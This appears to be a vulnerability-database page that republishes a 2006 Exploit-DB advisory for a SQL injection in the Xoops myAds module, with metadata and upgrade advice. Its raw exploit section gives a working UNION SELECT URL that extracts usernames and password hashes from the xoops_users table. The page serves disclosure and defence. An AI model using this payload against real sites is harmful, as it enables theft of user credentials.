Xoops myAds module SQL-Injection

vendor:

myAds module

by:

KeyCoder

7,5

CVSS

HIGH

SQL-injection

CWE

Product Name: myAds module

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Xoops myAds module SQL-Injection

Xoops myAds module is vulnerable to SQL-injection. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable file annonces-p-f.php with the parameter op. This will allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of Xoops myAds module.

Source

Exploit-DB raw data:

#######################################
# Xoops myAds module SQL-Injection
# Discovered: KeyCoder <Turkish Coder>
# Visit :     www.grisapka.org
# Contact:    keycoder@msn.com
# Thanx:      SecretlyX-BeLa
#######################################
---------------------------------------
# Details  :
# Xoops myAds module SQL-Injection Vulnerability
# Website : http://www.xoops.org/
# Vulnerable File : annonces-p-f.php
# PoC : http://host/path/modules/myAds/annonces-p-f.php?op=[SQL]
---------------------------------------

Vulnerability:

SQL-injection

http://www.site.com/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*

# milw0rm.com [2006-06-28]